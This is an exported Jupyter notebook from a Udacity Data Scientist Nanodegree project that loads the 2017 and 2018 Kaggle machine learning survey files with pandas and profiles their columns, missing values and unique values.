# Udacity Data Scienctist Nano Degree Project 1

jupyter notebook --NotebookApp.iopub_data_rate_limit=1.0e10

## TOC: <a class="anchor" id="toc"></a>
* [Project Overview](#overview-bullet)
* [Dataset](#dataset-bullet)
* [Questions](#questions-bullet)
* [Imports](#imports-bullet)
* [Common Functions](#common-bullet)
* [Load Data](#load-bullet)
* [Understand Data](#understand-bullet)

## Project Overview <a class="anchor" id="overview-bullet"></a>
For [Udacity Data Scientist Nano Degree](https://www.udacity.com/course/data-scientist-nanodegree--nd025) project 1 you pick a dataset and using your dataset you choose 3 questions you aspire to answer from the data.

## Dataset <a class="anchor" id="dataset-bullet"></a>   
[TOC](#toc)

## Questions  <a class="anchor" id="questions-bullet"></a>   
[TOC](#toc)   

Needs more refinement.  Just a rough list at this point.  


Possible outline:

## Imports  <a class="anchor" id="imports-bullet"></a>

In [2]:
import pandas as pd

## Common functions  <a class="anchor" id="common-bullet"></a>   
[TOC](#toc)

In [3]:
def unique_values_info(df):
    number_unique_vals = []
    percent_unique_vals = []
    for col_name in df.columns.tolist():
        number_unique_vals.append(len(df[col_name].unique()))
        percent_unique_vals.append(round(((len(df[col_name].unique())/df.shape[0])*100),2))
    return number_unique_vals, percent_unique_vals

In [4]:
def data_range_info(df):
    col_data_range = []
    col_data_range_count = []
    for col_name, col_dtype in zip(df.columns.tolist(), df.dtypes.tolist()):
        if col_dtype in ['int64', 'float64', 'datetime64[ns]']:
            col_data_range.append([df[col_name].min(), df[col_name].max()])
            col_data_range_count.append([])
        else:
            #col_data_range.append(df[col_name].unique().tolist())
            col_data_range.append(df[col_name].value_counts().index.tolist())
            col_data_range_count.append(df[col_name].value_counts().tolist())
    return col_data_range, col_data_range_count

In [5]:
def get_dataframe_info(df):
    info = {}
    
    num_rows = df.shape[0]
    num_cols = df.shape[1]
    num_nans = df.isnull().sum(axis=0).sum()
    
    info['name'] = df.columns.tolist()
    info['dtype'] = df.dtypes.tolist()
    nans = df.isnull().sum(axis=0).tolist()
    info['num_nans'] = nans
    pct_nans = [round((nan/df.shape[0])*100,2) for nan in nans]
    info['pct_nans'] = pct_nans
    
    col_data_range, col_data_range_count = data_range_info(df)
    info['data_range'] = col_data_range
    info['data_range_count'] = col_data_range_count
    
    col_number_unique_vals, col_percent_unique_vals = unique_values_info(df)
    info['num_unique'] = col_number_unique_vals
    info['pct_unique'] = col_percent_unique_vals
    
    df_info = pd.DataFrame(info) 
    df_info.set_index('name', inplace = True) 
        
    return num_rows, num_cols, num_nans, df_info

In [6]:
def convert_string_to_number(df, columns):
    for column in columns:
        df[column] = df[column].str.replace(r'\D+', '')
        df[column] = pd.to_numeric(df[column], errors='coerce')
    return df

## Load the 2107 Kaggle survey data <a class="anchor" id="load-bullet"></a>

In [27]:
df_ff_2017 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2017/freeformResponses.csv', encoding="ISO-8859-1", low_memory=False)
df_mc_2017 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2017/multipleChoiceResponses.csv', encoding="ISO-8859-1", low_memory=False)
df_ss_2017 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2017/schema.csv', encoding="ISO-8859-1", low_memory=False)

## Understand the data  <a class="anchor" id="understand-bullet"></a>  
[TOC](#toc)

### Free Form Responses
____

In [28]:
df_ff_2017.head()

,GenderFreeForm,KaggleMotivationFreeForm,CurrentJobTitleFreeForm,MLToolNextYearFreeForm,MLMethodNextYearFreeForm,LanguageRecommendationFreeForm,PublicDatasetsFreeForm,PersonalProjectsChallengeFreeForm,LearningPlatformCommunityFreeForm,LearningPlatformFreeForm1,...,WorkMethodsFrequencySelect2FreeForm,WorkMethodsFrequencySelect3FreeForm,TimeOtherSelectFreeForm,WorkChallengesFreeForm,WorkChallengeFrequencyOtherFreeForm,WorkMLTeamSeatFreeForm,WorkDataStorageFreeForm,WorkCodeSharingFreeForm,SalaryChangeFreeForm,JobSearchResourceFreeForm
0,NaN,NaN,NaN,NaN,NaN,NaN,NaN,Data manipulation,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,NaN,NaN,NaN,NaN,NaN,NaN,NaN,I can't find time to practice consistently,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,NaN,NaN,teacher,NaN,NaN,NaN,NaN,NaN,NaN,Meetups,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,NaN,NaN,NaN,NaN,NaN,NaN,NaN,Connectivity/data fusion,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN

In [29]:
num_rows, num_cols, num_nans, df_freeform_info = get_dataframe_info(df_ff_2017)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_freeform_info)

number of rows: 16716
number of columns: 62
number of nans: 999241

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
GenderFreeForm,object,16582,99.20,"[Male, Attack Helicopter, Female, Attack helic...","[12, 6, 5, 4, 3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1,...",105,0.63
KaggleMotivationFreeForm,object,15970,95.54,"[Curiosity, Fun, learning, Learning, hobby, fu...","[14, 12, 11, 8, 7, 5, 5, 4, 4, 3, 3, 3, 2, 2, ...",669,4.00
CurrentJobTitleFreeForm,object,15573,93.16,"[Project Manager, Professor, Consultant, Actua...","[27, 23, 22, 20, 19, 17, 14, 14, 11, 10, 10, 9...",765,4.58
MLToolNextYearFreeForm,object,16331,97.70,"[PyTorch, pytorch, Keras, Pytorch, Scala, Spar...","[26, 18, 14, 12, 10, 7, 6, 6, 6, 5, 5, 4, 4, 3...",249,1.49
MLMethodNextYearFreeForm,object,16489,98.64,"[Reinforcement Learning, Reinforcement learnin...","[19, 13, 9, 8, 7, 5, 4, 2, 2, 2, 2, 2, 2, 2, 2...",159,0.95
...,...,...,...,...,...,...,...
WorkMLTeamSeatFreeForm,object,15790,94.46,"[Engineering, R&D, Research, Marketing, engine...","[27, 25, 16, 13, 9, 8, 8, 6, 6, 6, 6, 6, 5, 5,...",699,4.18
WorkDataStorageFreeForm,object,16462,98.48,"[HDFS, Excel, HDF5, parquet, Oracle, Teradata,...","[7, 5, 5, 5, 4, 4, 3, 3, 3, 3, 3, 3, 3, 2, 2, ...",208,1.24
WorkCodeSharingFreeForm,object,16342,97.76,"[TFS, Gitlab, Github, None, Slack, gitlab, Per...","[22, 15, 15, 13, 11, 11, 8, 8, 6, 6, 6, 5, 5, ...",223,1.33
SalaryChangeFreeForm,object,16615,99.40,"[Just started, Hourly pay had increased but si...","[2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",101,0.60
JobSearchResourceFreeForm,object,16520,98.83,"[LinkedIn, Linkedin, linkedin, None, none, Net...","[17, 9, 5, 4, 3, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1,...",157,0.94

### Multiple Choice
____

In [30]:
df_mc_2017.head()

,GenderSelect,Country,Age,EmploymentStatus,StudentStatus,LearningDataScience,CodeWriter,CareerSwitcher,CurrentJobTitleSelect,TitleFit,...,JobFactorExperienceLevel,JobFactorDepartment,JobFactorTitle,JobFactorCompanyFunding,JobFactorImpact,JobFactorRemote,JobFactorIndustry,JobFactorLeaderReputation,JobFactorDiversity,JobFactorPublishingOpportunity
0,"Non-binary, genderqueer, or gender non-conforming",NaN,NaN,Employed full-time,NaN,NaN,Yes,NaN,DBA/Database Engineer,Fine,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,Female,United States,30.0,"Not employed, but looking for work",NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,Somewhat important,NaN,NaN
2,Male,Canada,28.0,"Not employed, but looking for work",NaN,NaN,NaN,NaN,NaN,NaN,...,Very Important,Very Important,Very Important,Very Important,Very Important,Very Important,Very Important,Very Important,Very Important,Very Important
3,Male,United States,56.0,"Independent contractor, freelancer, or self-em...",NaN,NaN,Yes,NaN,Operations Research Practitioner,Poorly,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,Male,Taiwan,38.0,Employed full-time,NaN,NaN,Yes,NaN,Computer Scientist,Fine,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN

In [31]:
num_rows, num_cols, num_nans, df_mchoice_info = get_dataframe_info(df_mc_2017)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_mchoice_info)

number of rows: 16716
number of columns: 228
number of nans: 2874279

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
GenderSelect,object,95,0.57,"[Male, Female, A different identity, Non-binar...","[13610, 2778, 159, 74]",5,0.03
Country,object,121,0.72,"[United States, India, Other, Russia, United K...","[4197, 2704, 1023, 578, 535, 471, 465, 460, 44...",53,0.32
Age,float64,331,1.98,"[0.0, 100.0]",[],85,0.51
EmploymentStatus,object,0,0.00,"[Employed full-time, Not employed, but looking...","[10897, 2110, 1330, 924, 917, 420, 118]",7,0.04
StudentStatus,object,15436,92.34,"[Yes, No]","[981, 299]",3,0.02
...,...,...,...,...,...,...,...
JobFactorRemote,object,13292,79.52,"[Somewhat important, Very Important, Not impor...","[1509, 960, 955]",4,0.02
JobFactorIndustry,object,13307,79.61,"[Somewhat important, Very Important, Not impor...","[1724, 1069, 616]",4,0.02
JobFactorLeaderReputation,object,13315,79.65,"[Somewhat important, Very Important, Not impor...","[1769, 920, 712]",4,0.02
JobFactorDiversity,object,13306,79.60,"[Somewhat important, Very Important, Not impor...","[1662, 896, 852]",4,0.02
JobFactorPublishingOpportunity,object,13292,79.52,"[Somewhat important, Very Important, Not impor...","[1503, 1218, 703]",4,0.02

### Schema

In [32]:
df_ss_2017.head()

             Column                                           Question Asked
0      GenderSelect     Select your gender identity. - Selected Choice   All
1    GenderFreeForm  Select your gender identity. - A different ide...   All
2           Country          Select the country you currently live in.   All
3               Age                                   What's your age?   All
4  EmploymentStatus             What's your current employment status?   All

In [33]:
num_rows, num_cols, num_nans, df_schema_info = get_dataframe_info(df_ss_2017)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_schema_info)

number of rows: 290
number of columns: 3
number of nans: 0

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
Column,object,0,0.0,"[LearningPlatformUsefulnessTextbook, BlogsPodc...","[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",290,100.0
Question,object,0,0.0,[Which best describes your undergraduate major...,"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",290,100.0
Asked,object,0,0.0,"[CodingWorker, All, Learners, Worker1, CodingW...","[161, 70, 41, 6, 5, 2, 2, 2, 1]",9,3.1

## Load the 2018 Kaggle survey data <a class="anchor" id="load-bullet"></a>

In [34]:
df_ff_2018 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2018/freeFormResponses.csv', encoding="ISO-8859-1", low_memory=False)
df_mc_2018 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2018/multipleChoiceResponses.csv', encoding="ISO-8859-1", low_memory=False)
df_ss_2018 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2018/SurveySchema.csv', encoding="ISO-8859-1", low_memory=False)

## Understand the data  <a class="anchor" id="understand-bullet"></a>  
[TOC](#toc)

### Free Form Responses
____

In [35]:
df_ff_2018.head()

,Q11_OTHER_TEXT,Q12_OTHER_TEXT,Q12_Part_1_TEXT,Q12_Part_2_TEXT,Q12_Part_3_TEXT,Q12_Part_4_TEXT,Q12_Part_5_TEXT,Q13_OTHER_TEXT,Q14_OTHER_TEXT,Q15_OTHER_TEXT,...,Q34_OTHER_TEXT,Q35_OTHER_TEXT,Q36_OTHER_TEXT,Q37_OTHER_TEXT,Q38_OTHER_TEXT,Q42_OTHER_TEXT,Q49_OTHER_TEXT,Q50_OTHER_TEXT,Q6_OTHER_TEXT,Q7_OTHER_TEXT
0,Select any activities that make up an importan...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,Which of the following integrated development ...,Which of the following hosted notebooks have y...,Which of the following cloud computing service...,...,During a typical data science project at work ...,What percentage of your current machine learni...,On which online platforms have you begun or co...,On which online platform have you spent the mo...,Who/what are your favorite media sources that ...,What metrics do you or your organization use t...,What tools and methods do you use to make your...,What barriers prevent you from making your wor...,Select the title most similar to your current ...,In what industry is your current employer/cont...
1,NaN,NaN,NaN,NaN,NaN,"Jupyter Notebooks, Pycharm, Intelijidea",NaN,NaN,NaN,NaN,...,0.0,NaN,mlcourse.ai,NaN,ods.ai,NaN,NaN,NaN,NaN,NaN
2,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,NaN,NaN,NaN,NaN,NaN,anaconda,NaN,NaN,NaN,NaN,...,0,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN

In [36]:
num_rows, num_cols, num_nans, df_freeform_info = get_dataframe_info(df_ff_2018)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_freeform_info)

number of rows: 23860
number of columns: 35
number of nans: 786799

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
Q11_OTHER_TEXT,object,23315,97.72,"[I am a student, Student, I'm a student, stude...","[49, 46, 15, 13, 5, 4, 3, 3, 2, 2, 2, 2, 2, 2,...",400,1.68
Q12_OTHER_TEXT,object,22095,92.60,"[Python, python, None, Matlab, matlab, none, M...","[165, 106, 55, 39, 24, 24, 21, 18, 12, 10, 9, ...",1112,4.66
Q12_Part_1_TEXT,object,19932,83.54,"[Excel, Microsoft Excel, excel, Google Sheets,...","[1237, 416, 311, 92, 75, 36, 35, 35, 33, 27, 2...",1211,5.08
Q12_Part_2_TEXT,object,22412,93.93,"[SAS, R, SPSS, Python, Sas, spss, Matlab, Spss...","[213, 152, 145, 57, 37, 32, 31, 29, 22, 21, 19...",506,2.12
Q12_Part_3_TEXT,object,22726,95.25,"[Tableau, Power BI, tableau, PowerBI, Spotfire...","[322, 54, 34, 23, 23, 21, 17, 15, 14, 9, 9, 8,...",483,2.02
Q12_Part_4_TEXT,object,14307,59.96,"[JupyterLab, RStudio, Jupyter, Python, Rstudio...","[748, 733, 682, 496, 294, 257, 243, 197, 192, ...",3368,14.12
Q12_Part_5_TEXT,object,22507,94.33,"[AWS, GCP, Azure, aws, Aws, AWS, GCP, Databric...","[307, 141, 115, 55, 49, 14, 14, 11, 11, 8, 8, ...",551,2.31
Q13_OTHER_TEXT,object,22667,95.00,"[Eclipse, Emacs, emacs, eclipse, Netbeans, Net...","[189, 93, 64, 32, 24, 21, 18, 14, 13, 12, 12, ...",495,2.07
Q14_OTHER_TEXT,object,23358,97.90,"[Databricks, Watson Studio, Zeppelin, IBM Wats...","[32, 15, 14, 12, 11, 10, 10, 7, 6, 6, 5, 5, 5,...",315,1.32
Q15_OTHER_TEXT,object,23272,97.54,"[Digital Ocean, DigitalOcean, None, Dropbox, H...","[40, 20, 13, 11, 10, 9, 9, 8, 8, 8, 7, 6, 5, 5...",372,1.56
Q16_OTHER_TEXT,object,23263,97.50,"[Swift, Perl, Kotlin, Clojure, Haskell, Fortra...","[34, 30, 25, 17, 16, 14, 14, 12, 10, 8, 7, 6, ...",306,1.28
Q17_OTHER_TEXT,object,23746,99.52,"[Swift, Kotlin, Clojure, Perl, Delphi, 1C, Pyt...","[12, 7, 6, 6, 4, 3, 3, 2, 2, 2, 2, 2, 2, 2, 1,...",74,0.31
Q18_OTHER_TEXT,object,23698,99.32,"[C, Julia, I don't know, Clojure, octave, Octa...","[18, 18, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2...",113,0.47
Q19_OTHER_TEXT,object,23409,98.11,"[Theano, Chainer, chainer, Weka, weka, NLTK, d...","[21, 16, 14, 12, 7, 7, 7, 6, 5, 5, 5, 4, 4, 4,...",316,1.32
Q1_OTHER_TEXT,object,23780,99.66,"[Agender, non-binary, Non-binary, Female, Atta...","[4, 4, 3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, ...",68,0.28
Q20_OTHER_TEXT,object,23766,99.61,"[Chainer, NLTK, Weka, chainer, Mallet, Caret, ...","[5, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, ...",79,0.33
Q21_OTHER_TEXT,object,23367,97.93,"[Tableau, Highcharts, Dash, Power BI, tableau,...","[56, 12, 9, 9, 8, 7, 7, 6, 6, 6, 5, 5, 5, 4, 4...",302,1.27
Q22_OTHER_TEXT,object,23765,99.60,"[Tableau, Matlab, PowerBI, Power BI, Mathemati...","[14, 3, 3, 3, 3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1,...",70,0.29
Q27_OTHER_TEXT,object,23552,98.71,"[AWS EMR, AWS Sagemaker, AWS SageMaker, Alibab...","[9, 7, 6, 5, 5, 5, 4, 3, 3, 3, 3, 3, 2, 2, 2, ...",244,1.02
Q28_OTHER_TEXT,object,23673,99.22,"[KNIME, Knime, Databricks, Alteryx, Weka, Oran...","[7, 5, 5, 4, 4, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, ...",161,0.67
Q29_OTHER_TEXT,object,23328,97.77,"[MongoDB, Teradata, AWS Redshift, Snowflake, S...","[62, 46, 25, 12, 12, 11, 10, 9, 9, 8, 8, 7, 7,...",243,1.02
Q30_OTHER_TEXT,object,23657,99.15,"[Spark, Cloudera, Vertica, Hadoop, SAP HANA, H...","[10, 7, 6, 6, 3, 3, 3, 3, 2, 2, 2, 2, 2, 1, 1,...",166,0.70
Q31_OTHER_TEXT,object,23625,99.02,"[None, none, Survey, Survey Data, Logs, Medica...","[7, 5, 4, 4, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 1, ...",207,0.87
Q32_OTHER,object,23808,99.78,"[Streams, Network Data, radar, Seismic Data, C...","[2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",51,0.21
Q33_OTHER_TEXT,object,23492,98.46,"[Kaggle, ods.ai, kaggle, UCI, data.world, NCBI...","[42, 13, 13, 12, 7, 5, 3, 3, 2, 2, 2, 2, 2, 2,...",271,1.14
Q34_OTHER_TEXT,object,7922,33.20,"[0.0, 10.0, 5.0, 0, 20.0, 100.0, 15.0, 10, 5, ...","[9920, 1335, 1294, 1229, 328, 309, 225, 213, 2...",108,0.45
Q35_OTHER_TEXT,object,23311,97.70,"[Bootcamp, Books, Youtube, bootcamp, None, 100...","[20, 19, 11, 11, 10, 10, 9, 8, 7, 6, 6, 5, 5, ...",365,1.53
Q36_OTHER_TEXT,object,22799,95.55,"[mlcourse.ai, Lynda, Youtube, Pluralsight, ods...","[46, 29, 23, 18, 17, 16, 16, 15, 15, 14, 12, 1...",629,2.64
Q37_OTHER_TEXT,object,23522,98.58,"[mlcourse.ai, youtube, Youtube, ods.ai, Lynda,...","[14, 10, 9, 8, 8, 7, 6, 6, 6, 6, 5, 5, 5, 4, 3...",237,0.99
Q38_OTHER_TEXT,object,22498,94.29,"[ods.ai, Analytics Vidhya, LinkedIn, Data Scie...","[101, 35, 28, 16, 15, 13, 13, 9, 9, 9, 9, 8, 8...",847,3.55
Q42_OTHER_TEXT,object,23650,99.12,"[AUC, I am a student, Precision recall, I'm a ...","[3, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",208,0.87
Q49_OTHER_TEXT,object,23689,99.28,"[Dataiku, R markdown, Some in-house solutions ...","[2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",170,0.71
Q50_OTHER_TEXT,object,23428,98.19,"[Confidentiality, Proprietary Data, Private da...","[4, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, ...",410,1.72
Q6_OTHER_TEXT,object,22537,94.46,"[Professor, Teacher, Machine Learning Engineer...","[49, 42, 39, 17, 16, 15, 14, 10, 9, 8, 8, 8, 8...",864,3.62
Q7_OTHER_TEXT,object,22923,96.07,"[Consulting, Automotive, Agriculture, Construc...","[78, 21, 20, 17, 16, 14, 14, 13, 12, 10, 9, 9,...",559,2.34

### Multiple Choice
____

In [37]:
df_mc_2018.head()

,Time from Start to Finish (seconds),Q1,Q1_OTHER_TEXT,Q2,Q3,Q4,Q5,Q6,Q6_OTHER_TEXT,Q7,...,Q49_OTHER_TEXT,Q50_Part_1,Q50_Part_2,Q50_Part_3,Q50_Part_4,Q50_Part_5,Q50_Part_6,Q50_Part_7,Q50_Part_8,Q50_OTHER_TEXT
0,Duration (in seconds),What is your gender? - Selected Choice,What is your gender? - Prefer to self-describe...,What is your age (# years)?,In which country do you currently reside?,What is the highest level of formal education ...,Which best describes your undergraduate major?...,Select the title most similar to your current ...,Select the title most similar to your current ...,In what industry is your current employer/cont...,...,What tools and methods do you use to make your...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...,What barriers prevent you from making your wor...
1,710,Female,-1,45-49,United States of America,Doctoral degree,Other,Consultant,-1,Other,...,-1,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,-1
2,434,Male,-1,30-34,Indonesia,Bachelorâs degree,Engineering (non-computer focused),Other,0,Manufacturing/Fabrication,...,-1,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,-1
3,718,Female,-1,30-34,United States of America,Masterâs degree,"Computer science (software engineering, etc.)",Data Scientist,-1,I am a student,...,-1,NaN,Too time-consuming,NaN,NaN,NaN,NaN,NaN,NaN,-1
4,621,Male,-1,35-39,United States of America,Masterâs degree,"Social sciences (anthropology, psychology, soc...",Not employed,-1,NaN,...,-1,NaN,NaN,Requires too much technical knowledge,NaN,Not enough incentives to share my work,NaN,NaN,NaN,-1

In [38]:
num_rows, num_cols, num_nans, df_mchoice_info = get_dataframe_info(df_mc_2018)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_mchoice_info)

number of rows: 23860
number of columns: 395
number of nans: 7067628

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
Time from Start to Finish (seconds),object,0,0.00,"[101, 142, 94, 156, 102, 134, 106, 93, 131, 88...","[31, 31, 30, 29, 27, 27, 27, 27, 27, 26, 26, 2...",6523,27.34
Q1,object,0,0.00,"[Male, Female, Prefer not to say, Prefer to se...","[19430, 4010, 340, 79, 1]",5,0.02
Q1_OTHER_TEXT,object,0,0.00,"[-1, 42, 25, 20, 18, 14, 63, 11, 4, 51, 62, 59...","[23780, 4, 4, 3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1,...",68,0.28
Q2,object,0,0.00,"[25-29, 22-24, 30-34, 18-21, 35-39, 40-44, 45-...","[6159, 5141, 3776, 3037, 2253, 1360, 858, 582,...",13,0.05
Q3,object,0,0.00,"[United States of America, India, China, Other...","[4716, 4417, 1644, 1036, 879, 736, 734, 702, 6...",59,0.25
...,...,...,...,...,...,...,...
Q50_Part_5,object,20290,85.04,"[Not enough incentives to share my work, What ...","[3569, 1]",3,0.01
Q50_Part_6,object,22800,95.56,[I had never considered making my work easier ...,"[1059, 1]",3,0.01
Q50_Part_7,object,21359,89.52,"[None of these reasons apply to me, What barri...","[2500, 1]",3,0.01
Q50_Part_8,object,23339,97.82,"[Other, What barriers prevent you from making ...","[520, 1]",3,0.01
Q50_OTHER_TEXT,object,0,0.00,"[-1, 120, 6, 195, 48, 31, 26, 145, 58, 44, 43,...","[23428, 4, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2,...",410,1.72

### Schema

In [39]:
df_ss_2018.head()

,2018 Kaggle Machine Learning and Data Science Survey,Q1,Q10,Q11,Q12,Q13,Q14,Q15,Q16,Q17,...,Q47,Q48,Q49,Q5,Q50,Q6,Q7,Q8,Q9,Time from Start to Finish (seconds)
0,Question:,What is your gender? - Selected Choice,Does your current employer incorporate machine...,Select any activities that make up an importan...,What is the primary tool that you use at work ...,Which of the following integrated development ...,Which of the following hosted notebooks have y...,Which of the following cloud computing service...,What programming languages do you use on a reg...,What specific programming language do you use ...,...,What methods do you prefer for explaining and/...,"Do you consider ML models to be ""black boxes"" ...",What tools and methods do you use to make your...,Which best describes your undergraduate major?...,What barriers prevent you from making your wor...,Select the title most similar to your current ...,In what industry is your current employer/cont...,How many years of experience do you have in yo...,What is your current yearly compensation (appr...,Duration (in seconds)
1,# of Respondents:,23860,20670,19518,19199,19117,18971,18864,18828,15223,...,13418,13369,12891,22948,12814,22901,21686,21102,20186,23860
2,Who was excluded? (0 = not excluded; 1 = exclu...,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
3,If What is your age (# years)? 0-17 Is Selecte...,0,1,1,1,1,1,1,1,1,...,1,1,1,1,1,1,1,1,1,0
4,If What is the highest level of formal educati...,0,0,0,0,0,0,0,0,0,...,0,0,0,1,0,0,0,0,0,0

In [40]:
num_rows, num_cols, num_nans, df_schema_info = get_dataframe_info(df_ss_2018)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_schema_info)

number of rows: 12
number of columns: 52
number of nans: 0

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
2018 Kaggle Machine Learning and Data Science Survey,object,0,0.0,[Who was excluded? (0 = not excluded; 1 = excl...,"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]",12,100.00
Q1,object,0,0.0,"[0, What is your gender? - Selected Choice, 23...","[10, 1, 1]",3,25.00
Q10,object,0,0.0,"[0, 1, Does your current employer incorporate ...","[8, 2, 1, 1]",4,33.33
Q11,object,0,0.0,"[0, 1, 19518, Select any activities that make ...","[8, 2, 1, 1]",4,33.33
Q12,object,0,0.0,"[0, 1, 19199, What is the primary tool that yo...","[9, 1, 1, 1]",4,33.33
Q13,object,0,0.0,"[0, Which of the following integrated developm...","[9, 1, 1, 1]",4,33.33
Q14,object,0,0.0,"[0, Which of the following hosted notebooks ha...","[9, 1, 1, 1]",4,33.33
Q15,object,0,0.0,"[0, Which of the following cloud computing ser...","[9, 1, 1, 1]",4,33.33
Q16,object,0,0.0,"[0, What programming languages do you use on a...","[9, 1, 1, 1]",4,33.33
Q17,object,0,0.0,"[0, What specific programming language do you ...","[9, 1, 1, 1]",4,33.33
Q18,object,0,0.0,"[0, 1, What programming language would you rec...","[9, 1, 1, 1]",4,33.33
Q19,object,0,0.0,"[0, 18697, What machine learning frameworks ha...","[9, 1, 1, 1]",4,33.33
Q2,object,0,0.0,"[0, 23860, What is your age (# years)?]","[10, 1, 1]",3,25.00
Q20,object,0,0.0,"[0, 1, 12990, Of the choices that you selected...","[9, 1, 1, 1]",4,33.33
Q21,object,0,0.0,"[0, What data visualization libraries or tools...","[9, 1, 1, 1]",4,33.33
Q22,object,0,0.0,"[0, Of the choices that you selected in the pr...","[9, 1, 1, 1]",4,33.33
Q23,object,0,0.0,"[0, Approximately what percent of your time at...","[9, 1, 1, 1]",4,33.33
Q24,object,0,0.0,"[0, How long have you been writing code to ana...","[9, 1, 1, 1]",4,33.33
Q25,object,0,0.0,"[0, 1, 18492, For how many years have you used...","[8, 2, 1, 1]",4,33.33
Q26,object,0,0.0,"[0, 1, 18481, Do you consider yourself to be a...","[8, 2, 1, 1]",4,33.33
Q27,object,0,0.0,"[0, 1, Which of the following cloud computing ...","[7, 3, 1, 1]",4,33.33
Q28,object,0,0.0,"[0, 1, Which of the following machine learning...","[7, 3, 1, 1]",4,33.33
Q29,object,0,0.0,"[0, 1, Which of the following relational datab...","[7, 3, 1, 1]",4,33.33
Q3,object,0,0.0,"[0, 23860, In which country do you currently r...","[9, 1, 1, 1]",4,33.33
Q30,object,0,0.0,"[0, 1, Which of the following big data and ana...","[7, 3, 1, 1]",4,33.33
Q31,object,0,0.0,"[0, 1, 16922, Which types of data do you curre...","[8, 2, 1, 1]",4,33.33
Q32,object,0,0.0,"[0, 1, 13879, What is the type of data that yo...","[8, 2, 1, 1]",4,33.33
Q33,object,0,0.0,"[0, 1, Where do you find public datasets? (Sel...","[8, 2, 1, 1]",4,33.33
Q34,object,0,0.0,"[0, 1, During a typical data science project a...","[8, 2, 1, 1]",4,33.33
Q35,object,0,0.0,"[0, 1, 15746, What percentage of your current ...","[8, 2, 1, 1]",4,33.33
Q36,object,0,0.0,"[0, 1, 15672, On which online platforms have y...","[8, 2, 1, 1]",4,33.33
Q37,object,0,0.0,"[0, 1, 9671, On which online platform have you...","[7, 3, 1, 1]",4,33.33
Q38,object,0,0.0,"[0, 1, Who/what are your favorite media source...","[9, 1, 1, 1]",4,33.33
Q39,object,0,0.0,"[0, 15980, How do you perceive the quality of ...","[9, 1, 1, 1]",4,33.33
